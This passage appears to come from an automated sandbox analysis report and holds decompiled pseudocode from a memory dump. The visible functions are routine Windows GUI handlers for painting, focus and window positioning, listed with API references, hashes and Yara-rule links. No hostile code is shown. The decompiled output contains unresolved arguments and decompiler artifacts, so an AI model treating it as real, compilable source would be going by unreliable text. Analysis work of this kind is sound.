									_t293 = _v17;
									_v16 = E0045AAAC(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t364 = _t364 + 1;
									_t276 = _t276 - 1;
									__eflags = _t276;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E00443E0C( *((intOrPtr*)(_v16 + 0x58)), _t293,  &_v52, __eflags);
								_t165 =  *0x4bb048; // 0x4bcb7c
								E00467DB8( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t278 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t278;
								if(_t278 < 0) {
									goto L67;
								} else {
									_t279 = _t278 + 1;
									_t365 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E0041C834(_v8, _t293, _t365);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t371 + 8);
										if(_t173 ==  *(_t371 + 8)) {
											break;
										}
										_t293 = 1;
										_t177 = E0045AAAC(_v48, 1,  *(_t371 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t365 = _t365 + 1;
											_t279 = _t279 - 1;
											__eflags = _t279;
											if(_t279 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E0045B3DC(_v48, _t371);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t376 == 0) {
						_t281 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t281;
						if(_t281 < 0) {
							goto L67;
						} else {
							_t282 = _t281 + 1;
							_t366 = 0;
							__eflags = 0;
							while(1) {
								E0041C834(_v8, _t293, _t366);
								_t181 = E0045AB4C( *(_t371 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t366 = _t366 + 1;
								_t282 = _t282 - 1;
								__eflags = _t282;
								if(_t282 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t284 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t284;
							if(_t284 < 0) {
								goto L67;
							} else {
								_t285 = _t284 + 1;
								_t367 = 0;
								__eflags = 0;
								while(1) {
									_t186 = E0041C834(_v8, _t293, _t367);
									_t293 = 0;
									_v16 = E0045AAAC(_t186, 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t367 = _t367 + 1;
									_t285 = _t285 - 1;
									__eflags = _t285;
									if(_t285 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E00428DB4(0, 1);
								_push(_t373);
								_push(0x45bb52);
								_push( *[fs:eax]);
								 *[fs:eax] = _t375;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t373);
								_push(0x45bb35);
								_push( *[fs:eax]);
								 *[fs:eax] = _t375;
								E0042955C(_v24,  *(_v40 + 0x18));
								E004293D8(_v24);
								E0045BFC4(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t329);
								 *[fs:eax] = _t329;
								_push(0x45bb3c);
								__eflags = 0;
								E0042955C(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t287 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t287;
								if(_t287 < 0) {
									goto L67;
								} else {
									_t288 = _t287 + 1;
									_t368 = 0;
									__eflags = 0;
									while(1) {
										_t218 = E0041C834(_v8, _t293, _t368);
										_t293 = 0;
										_v16 = E0045AAAC(_t218, 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t368 = _t368 + 1;
										_t288 = _t288 - 1;
										__eflags = _t288;
										if(_t288 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_v32 = GetWindowDC( *(_v8 + 0x10));
									 *[fs:eax] = _t375;
									_v24 = E00428DB4(0, 1);
									 *[fs:eax] = _t375;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t375;
									E0042955C(_v24, _v32);
									E004293D8(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x45bc53, _t373,  *[fs:eax], 0x45bc70, _t373,  *[fs:eax], 0x45bc95, _t373);
									_pop(_t338);
									 *[fs:eax] = _t338;
									_push(0x45bc5a);
									__eflags = 0;
									E0042955C(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t291 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t291;
									if(_t291 < 0) {
										goto L67;
									} else {
										_t292 = _t291 + 1;
										_t369 = 0;
										__eflags = 0;
										while(1) {
											_t252 =  *((intOrPtr*)( *((intOrPtr*)(E0041C834(_v8, _t293, _t369))) + 0x34))();
											_t342 = _v36;
											__eflags = _t252 -  *((intOrPtr*)(_t342 + 0xc));
											if(_t252 !=  *((intOrPtr*)(_t342 + 0xc))) {
												_t254 = E0041C834(_v8, _t293, _t369);
												_t293 = 1;
												_v16 = E0045AAAC(_t254, 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E0041C834(_v8, _t293, _t369) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t369 = _t369 + 1;
											_t292 = _t292 - 1;
											__eflags = _t292;
											if(_t292 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t258 = E0045AADC(E0041C834(_v8, _t293, _t369), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t258;
										if(_t258 == 0) {
											_t266 = E0041C834(_v8, 1, _t369);
											__eflags = 0;
											_t258 = E0045AADC(_t266, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t349 =  *0x4bb224; // 0x4bcb80
										_t351 =  *( *_t349 + 0x6c);
										__eflags = _t351;
										if(_t351 != 0) {
											__eflags = _t258;
											if(_t258 == 0) {
												_t258 =  *(_t351 + 0x158);
											}
											__eflags =  *(_t351 + 0x228) & 0x00000008;
											if(( *(_t351 + 0x228) & 0x00000008) == 0) {
												_t352 =  *0x4bb048; // 0x4bcb7c
												E00467A3C( *_t352, _t292, _t258, _t369, _t371);
											} else {
												E00467AC4();
											}
										}
									}
								} else {
									L67:
									_push( *(_t371 + 8));
									_push( *(_t371 + 4));
									_push( *_t371);
									_t144 =  *(_v8 + 0x10);
									_push(_t144);
									L0040703C();
									 *(_t371 + 0xc) = _t144;
								}
								L68:
								_pop(_t307);
								 *[fs:eax] = _t307;
								_push(0x45bd26);
								return E004043D8( &_v52);
							}
						}
					}
				}
				L69:
			}

0x0045b7ed
0x0045b7ef
0x0045b7f5
0x0045b7f7
0x0045b7fa
0x0045b7fc
0x0045b801
0x0045b802
0x0045b807
0x0045b80a
0x0045b80d
0x0045b80f
0x0045b814
0x0045b836
0x0045b836
0x0045b83b
0x0045b88a
0x0045b88b
0x0045b88d
0x00000000
0x0045b893
0x0045b893
0x0045b894
0x0045b894
0x0045b896
0x0045b8a3
0x0045b8a8
0x0045b8aa
0x00000000
0x00000000
0x0045b8b0
0x0045b8b1
0x0045b8b1
0x0045b8b2
0x00000000
0x0045b8b4
0x00000000
0x0045b8b4
0x00000000
0x0045b8b2
0x0045b896
0x0045b83d
0x0045b83d
0x0045b83d
0x0045b840
0x0045b8b9
0x0045b8bd
0x0045b8c1
0x0045b8c3
0x0045b8c3
0x0045b8cd
0x0045b8ce
0x0045b8d0
0x0045b946
0x0045b946
0x0045b94f
0x00000000
0x0045b8d2
0x0045b8d2
0x0045b8d3
0x0045b8d3
0x0045b8d5
0x0045b8d5
0x0045b8d9
0x0045b8ff
0x0045b8db
0x0045b8db
0x0045b8de
0x0045b8e0
0x0045b8f2
0x0045b8e2
0x0045b8ed
0x0045b8ed
0x0045b8e0
0x0045b907
0x0045b90c
0x0045b917
0x0045b91a
0x0045b91e
0x00000000
0x00000000
0x0045b942
0x0045b943
0x0045b943
0x0045b944
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0045b944
0x0045b929
0x0045b931
0x0045b938
0x0045b938
0x0045b842
0x0045b842
0x0045b843
0x0045bcac
0x0045bcad
0x0045bcaf
0x00000000
0x0045bcb1
0x0045bcb1
0x0045bcb2
0x0045bcb2
0x0045bcb4
0x0045bcbe
0x0045bcc6
0x0045bcc9
0x0045bccc
0x00000000
0x00000000
0x0045bcd1
0x0045bcd6
0x0045bcdb
0x0045bcdd
0x0045bceb
0x0045bcec
0x0045bcec
0x0045bced
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0045bcdd
0x0045bce4
0x0045bce4
0x0045b849
0x00000000
0x0045b849
0x0045b843
0x0045b840
0x00000000
0x0045b816
0x0045b816
0x0045b854
0x0045b855
0x0045b857
0x00000000
0x0045b85d
0x0045b85d
0x0045b85e
0x0045b85e
0x0045b860
0x0045b865
0x0045b86e
0x0045b873
0x0045b875
0x00000000
0x00000000
0x0045b87b
0x0045b87c
0x0045b87c
0x0045b87d
0x00000000
0x0045b87f
0x00000000
0x0045b87f
0x00000000
0x0045b87d
0x0045b860
0x00000000
0x0045b818
0x0045b818
0x0045b81b
0x0045ba5e
0x0045ba67
0x0045ba68
0x0045ba6a
0x00000000
0x0045ba70
0x0045ba70
0x0045ba71
0x0045ba71
0x0045ba73
0x0045ba78
0x0045ba83
0x0045ba8a
0x0045ba8d
0x0045ba91
0x00000000
0x00000000
0x0045bb59
0x0045bb5a
0x0045bb5a
0x0045bb5b
0x00000000
0x0045bb61
0x00000000
0x0045bb61
0x00000000
0x0045bb5b
0x0045baa3
0x0045baa8
0x0045baa9
0x0045baae
0x0045bab1
0x0045bac0
0x0045bac5
0x0045bac6
0x0045bacb
0x0045bace
0x0045bada
0x0045baef
0x0045bb08
0x0045bb0f
0x0045bb12
0x0045bb15
0x0045bb1a
0x0045bb1f
0x0045bb34
0x0045bb34
0x0045b821
0x0045b821
0x0045b822
0x0045bb69
0x0045bb72
0x0045bb73
0x0045bb75
0x00000000
0x0045bb7b
0x0045bb7b
0x0045bb7c
0x0045bb7c
0x0045bb7e
0x0045bb83
0x0045bb8e
0x0045bb95
0x0045bb98
0x0045bb9c
0x00000000
0x00000000
0x0045bc9c
0x0045bc9d
0x0045bc9d
0x0045bc9e
0x00000000
0x0045bca4
0x00000000
0x0045bca4
0x00000000
0x0045bc9e
0x0045bbae
0x0045bbbc
0x0045bbcb
0x0045bbd9
0x0045bbe5
0x0045bbf3
0x0045bbfc
0x0045bc11
0x0045bc2b
0x0045bc30
0x0045bc33
0x0045bc36
0x0045bc3b
0x0045bc40
0x0045bc52
0x0045bc52
0x0045b828
0x0045b82b
0x0045b95c
0x0045b965
0x0045b966
0x0045b968
0x00000000
0x0045b96e
0x0045b96e
0x0045b96f
0x0045b96f
0x0045b971
0x0045b97d
0x0045b980
0x0045b983
0x0045b986
0x0045b99f
0x0045b9aa
0x0045b9b1
0x0045b988
0x0045b995
0x0045b995
0x0045b9b4
0x0045b9b8
0x00000000
0x00000000
0x0045ba4e
0x0045ba4f
0x0045ba4f
0x0045ba50
0x00000000
0x0045ba56
0x00000000
0x0045ba56
0x00000000
0x0045ba50
0x0045b9d0
0x0045b9d5
0x0045b9d7
0x0045b9de
0x0045b9e9
0x0045b9eb
0x0045b9eb
0x0045b9f0
0x0045b9f8
0x0045b9fb
0x0045b9fd
0x0045ba03
0x0045ba05
0x0045ba0c
0x0045ba0c
0x0045ba18
0x0045ba1f
0x0045ba3b
0x0045ba44
0x0045ba21
0x0045ba31
0x0045ba31
0x0045ba1f
0x0045b9fd
0x0045b831
0x0045bcef
0x0045bcf2
0x0045bcf6
0x0045bcf9
0x0045bcfd
0x0045bd00
0x0045bd01
0x0045bd06
0x0045bd06
0x0045bd09
0x0045bd0b
0x0045bd0e
0x0045bd11
0x0045bd1e
0x0045bd1e
0x0045b822
0x0045b81b
0x0045b816
0x00000000

APIs

SaveDC.GDI32(?), ref: 0045BABB
RestoreDC.GDI32(?,?), ref: 0045BB2F
GetWindowDC.USER32(?), ref: 0045BBA9
SaveDC.GDI32(?), ref: 0045BBE0
RestoreDC.GDI32(?,?), ref: 0045BC4D
NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0045BD1F), ref: 0045BD01

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSaveWindow$NtdllProc_
String ID:
API String ID: 1346906915-0
Opcode ID: 95c3e9ad46ead51256eb9651a89e1287401cc4847bc80ba6a5a6eaa59e715442
Instruction ID: 48b1cd7b85039716402d31f6a6a9c09f7f70ce538e508dff473147ea1834fcb6
Opcode Fuzzy Hash: 95c3e9ad46ead51256eb9651a89e1287401cc4847bc80ba6a5a6eaa59e715442
Instruction Fuzzy Hash: A5E18134A00609DFDB11EFA9C98199EF7F5FF48305B2485AAE80197362D738ED45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00460A1C, Relevance: 9.3, APIs: 6, Instructions: 284
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00460A1C(intOrPtr __eax, struct HWND__** __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				struct HWND__* _v24;
				void* __ebp;
				struct HWND__* _t92;
				intOrPtr _t112;
				intOrPtr _t115;
				struct HWND__* _t121;
				struct HWND__* _t124;
				intOrPtr _t128;
				struct HWND__* _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				struct HWND__* _t133;
				struct HWND__* _t136;
				intOrPtr _t142;
				intOrPtr _t172;
				struct HWND__** _t201;
				struct HWND__* _t219;
				struct HWND__* _t220;
				intOrPtr _t229;
				void* _t231;
				void* _t232;
				intOrPtr _t238;
				intOrPtr _t246;
				struct HWND__* _t250;
				struct HWND__* _t251;
				struct HWND__* _t256;
				struct HWND__* _t257;
				void* _t259;
				void* _t261;
				intOrPtr _t262;
				void* _t264;
				void* _t268;

				_t259 = _t261;
				_t262 = _t261 + 0xffffffec;
				_t201 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t219 = _t92;
				_t264 = _t219 - 0x46;
				if(_t264 > 0) {
					_t220 = _t219 - 0xb01a;
					__eflags = _t220;
					if(_t220 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E00403814(_v8, __eflags);
						}
					} else {
						__eflags = _t220 == 1;
						if(_t220 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E00403814(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t264 == 0) {
						_t112 = _v8;
						_t229 =  *0x460e50; // 0x1
						__eflags = _t229 - ( *(_t112 + 0x1c) &  *0x460e4c);
						if(_t229 == ( *(_t112 + 0x1c) &  *0x460e4c)) {
							_t115 = _v8;
							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
								_t128 = _v8;
								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
								if( *((char*)(_t128 + 0x22b)) != 2) {
									_t129 = __edx[2];
									_t26 = _t129 + 0x18;
									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t121;
							if(_t121 == 0) {
								L30:
								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t124;
								if(_t124 == 0) {
									L32:
									 *( *((intOrPtr*)(_t201 + 8)) + 0x18) =  *( *((intOrPtr*)(_t201 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t124 == 3;
									if(_t124 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t121 == 2;
								if(_t121 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t231 = _t219 + 0xfffffffa - 3;
						if(_t231 < 0) {
							__eflags =  *0x4a0f34;
							if( *0x4a0f34 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t130 = _v8;
									__eflags =  *(_t130 + 0x1c) & 0x00000010;
									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t256 = 0;
										_t131 = _v8;
										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
										if( *((char*)(_t131 + 0x22f)) != 2) {
											_t133 =  *(_v8 + 0x220);
											__eflags = _t133;
											if(_t133 != 0) {
												__eflags = _t133 - _v8;
												if(_t133 != _v8) {
													_t256 = E0044D590(_t133);
												}
											}
										} else {
											_t136 = E00461348(_v8);
											__eflags = _t136;
											if(_t136 != 0) {
												_t256 = E0044D590(E00461348(_v8));
											}
										}
										__eflags = _t256;
										if(_t256 == 0) {
											goto L43;
										} else {
											_t92 = SetFocus(_t256);
										}
									}
								}
							}
							goto L44;
						} else {
							_t232 = _t231 - 0x22;
							if(_t232 == 0) {
								_v24 = __edx[2];
								__eflags = _v24->i - 1;
								if(_v24->i != 1) {
									goto L43;
								} else {
									_t142 = _v8;
									__eflags =  *(_t142 + 0x248);
									if( *(_t142 + 0x248) == 0) {
										goto L43;
									} else {
										_t250 = E0045AAAC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t250;
										if(_t250 == 0) {
											goto L43;
										} else {
											_v16 = E00428DB4(0, 1);
											_push(_t259);
											_push(0x460c95);
											_push( *[fs:eax]);
											 *[fs:eax] = _t262;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t259);
											_push(0x460c78);
											_push( *[fs:eax]);
											 *[fs:eax] = _t262;
											E0042955C(_v16,  *(_v24 + 0x18));
											E004293D8(_v16);
											E0045BFC4(_t250, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t238);
											 *[fs:eax] = _t238;
											_push(0x460c7f);
											__eflags = 0;
											E0042955C(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t232 == 1) {
									_t257 = __edx[2];
									__eflags = _t257->i - 1;
									if(_t257->i != 1) {
										goto L43;
									} else {
										_t172 = _v8;
										__eflags =  *(_t172 + 0x248);
										if( *(_t172 + 0x248) == 0) {
											goto L43;
										} else {
											_t251 = E0045AAAC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t257 + 8)));
											__eflags = _t251;
											if(_t251 == 0) {
												goto L43;
											} else {
												_v20 = GetWindowDC(E0044D590(_v8));
												 *[fs:eax] = _t262;
												_v16 = E00428DB4(0, 1);
												 *[fs:eax] = _t262;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t262;
												E0042955C(_v16, _v20);
												E004293D8(_v16);
												 *((intOrPtr*)(_t251->i + 0x38))(_t257 + 0x10,  *[fs:eax], 0x460d7f, _t259,  *[fs:eax], 0x460d9c, _t259,  *[fs:eax], 0x460dc3, _t259);
												_pop(_t246);
												 *[fs:eax] = _t246;
												_push(0x460d86);
												__eflags = 0;
												E0042955C(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t268 = _t92 -  *0x4bcb88; // 0xc07c
									if(_t268 == 0) {
										E00447F3C(_v8, 0, 0xb025, 0);
										E00447F3C(_v8, 0, 0xb024, 0);
										E00447F3C(_v8, 0, 0xb035, 0);
										E00447F3C(_v8, 0, 0xb009, 0);
										E00447F3C(_v8, 0, 0xb008, 0);
										E00447F3C(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t92 = E0044AFA4(_v8, _t201);
									L44:
									return _t92;
								}
							}
						}
					}
				}
			}

0x00460a1d
0x00460a1f
0x00460a25
0x00460a27
0x00460a2a
0x00460a2c
0x00460a2e
0x00460a31
0x00460a56
0x00460a56
0x00460a5c
0x00460b08
0x00460b0f
0x00460b1c
0x00460b1c
0x00460a62
0x00460a62
0x00460a63
0x00460ae7
0x00460aee
0x00460afb
0x00460afb
0x00460a65
0x00000000
0x00460a65
0x00460a63
0x00000000
0x00460a33
0x00460a33
0x00460b26
0x00460b34
0x00460b3b
0x00460b3e
0x00460b44
0x00460b4e
0x00460b50
0x00460b52
0x00460b55
0x00460b5c
0x00460b5e
0x00460b61
0x00460b61
0x00460b61
0x00460b61
0x00460b5c
0x00460b6e
0x00460b6e
0x00460b70
0x00460b7a
0x00460b83
0x00460b83
0x00460b85
0x00460b8f
0x00460b92
0x00460b87
0x00460b87
0x00460b89
0x00000000
0x00000000
0x00460b89
0x00460b72
0x00460b72
0x00460b74
0x00000000
0x00000000
0x00460b74
0x00460b70
0x00000000
0x00460a39
0x00460a3c
0x00460a3f
0x00460a6a
0x00460a71
0x00460a77
0x00460a7a
0x00000000
0x00460a80
0x00460a80
0x00460a83
0x00460a87
0x00000000
0x00460a8d
0x00460a8d
0x00460a8f
0x00460a92
0x00460a99
0x00460abb
0x00460ac1
0x00460ac3
0x00460ac5
0x00460ac8
0x00460acf
0x00460acf
0x00460ac8
0x00460a9b
0x00460a9e
0x00460aa3
0x00460aa5
0x00460ab4
0x00460ab4
0x00460aa5
0x00460ad1
0x00460ad3
0x00000000
0x00460ad9
0x00460ada
0x00460ada
0x00460ad3
0x00460a87
0x00460a7a
0x00000000
0x00460a41
0x00460a41
0x00460a44
0x00460b9e
0x00460ba4
0x00460ba7
0x00000000
0x00460bad
0x00460bad
0x00460bb0
0x00460bb7
0x00000000
0x00460bbd
0x00460bd3
0x00460bd5
0x00460bd7
0x00000000
0x00460bdd
0x00460be9
0x00460bee
0x00460bef
0x00460bf4
0x00460bf7
0x00460c06
0x00460c0b
0x00460c0c
0x00460c11
0x00460c14
0x00460c20
0x00460c33
0x00460c4b
0x00460c52
0x00460c55
0x00460c58
0x00460c5d
0x00460c62
0x00460c77
0x00460c77
0x00460bd7
0x00460bb7
0x00460a4a
0x00460a4b
0x00460c9c
0x00460c9f
0x00460ca2
0x00000000
0x00460ca8
0x00460ca8
0x00460cab
0x00460cb2
0x00000000
0x00460cb8
0x00460ccb
0x00460ccd
0x00460ccf
0x00000000
0x00460cd5
0x00460ce3
0x00460cf1
0x00460d00
0x00460d0e
0x00460d1a
0x00460d28
0x00460d31
0x00460d44
0x00460d57
0x00460d5c
0x00460d5f
0x00460d62
0x00460d67
0x00460d6c
0x00460d7e
0x00460d7e
0x00460ccf
0x00460cb2
0x00460a51
0x00460dca
0x00460dca
0x00460dd0
0x00460dde
0x00460def
0x00460e00
0x00460e11
0x00460e22
0x00460e33
0x00460e33
0x00460e38
0x00460e3d
0x00460e42
0x00460e48
0x00460e48
0x00460a4b
0x00460a44
0x00460a3f
0x00460a33

APIs

SetFocus.USER32 ref: 00460ADA
SaveDC.GDI32(?), ref: 00460C01
RestoreDC.GDI32(?,?), ref: 00460C72
GetWindowDC.USER32(00000000), ref: 00460CDE
SaveDC.GDI32(?), ref: 00460D15
RestoreDC.GDI32(?,?), ref: 00460D79

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSave$FocusWindow
String ID:
API String ID: 1553564791-0
Opcode ID: 735be3669c23069294712bf73b040927d142e75c115ee443a59895b32fa45eba
Instruction ID: df41744d0482e6c5423bc326cb51b6476b74b7390ef3ea2c4a99f6163abcc3be
Opcode Fuzzy Hash: 735be3669c23069294712bf73b040927d142e75c115ee443a59895b32fa45eba
Instruction Fuzzy Hash: F1B19235A00204EFCB14DFA8C985AAFB7F5EB49304F6544A6F404E7362E739AE01CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00466E64, Relevance: 9.1, APIs: 6, Instructions: 86
windownativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00466E64(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E00465D60( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E0044D590( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L0040703C();
						}
					}
					_t26 =  *0x4bae68; // 0x4bc904
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x4bae68; // 0x4bc904
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E004619F0(_t36, 0);
						E00463E14( *((intOrPtr*)(_t51 + 0x44)));
					}
					E004664B0(_t51);
					_t21 =  *0x4bcb80; // 0x1c40e90
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E0044D590(_t55));
					}
					if( *((short*)(_t51 + 0x122)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x120))();
					}
				}
				return _t21;
			}

0x00466e66
0x00466e6c
0x00466e73
0x00466e7d
0x00466e86
0x00466ec0
0x00466ec8
0x00466e97
0x00466ea5
0x00466ea7
0x00000000
0x00466ea9
0x00466ea9
0x00466eab
0x00466eb0
0x00466eb8
0x00466eb9
0x00466eb9
0x00466ea7
0x00466ed5
0x00466ede
0x00466ee0
0x00466ee2
0x00466ee2
0x00466ee8
0x00466ef1
0x00466ef3
0x00466ef5
0x00466ef5
0x00466eff
0x00466f04
0x00466f09
0x00466f1c
0x00466f24
0x00466f24
0x00466f2b
0x00466f30
0x00466f35
0x00466f3a
0x00466f44
0x00466f44
0x00466f51
0x00000000
0x00466f5b
0x00466f51
0x00466f63

APIs

IsIconic.USER32(?), ref: 00466E6C
SetActiveWindow.USER32(?), ref: 00466E7D
IsWindowEnabled.USER32(00000000), ref: 00466EA0
NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00466891,00000000,00466D4F), ref: 00466EB9
SetWindowPos.USER32(?,00000000,00000000,?,?,00466891,00000000), ref: 00466EFF
SetFocus.USER32 ref: 00466F44

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledFocusIconicNtdllProc_
String ID:
API String ID: 3996302123-0
Opcode ID: 9a729dc3667cd1bc5cc523d41ce0c4f52be4f6b65fbb32a82fcf7d51c1ea8602
Instruction ID: 345a9c80e758f710a3a73f3c540ac67a1ac8f3b4f8b4de9f110f0023fc02b51c
Opcode Fuzzy Hash: 9a729dc3667cd1bc5cc523d41ce0c4f52be4f6b65fbb32a82fcf7d51c1ea8602
Instruction Fuzzy Hash: 4631EE75B00240ABEB15EA69DD86B563798AB04704F0904AAFD00DF2D7EA7DEC44875E

Uniqueness

Uniqueness Score: -1.00%

Function 0044CF7C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0044CF7C(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
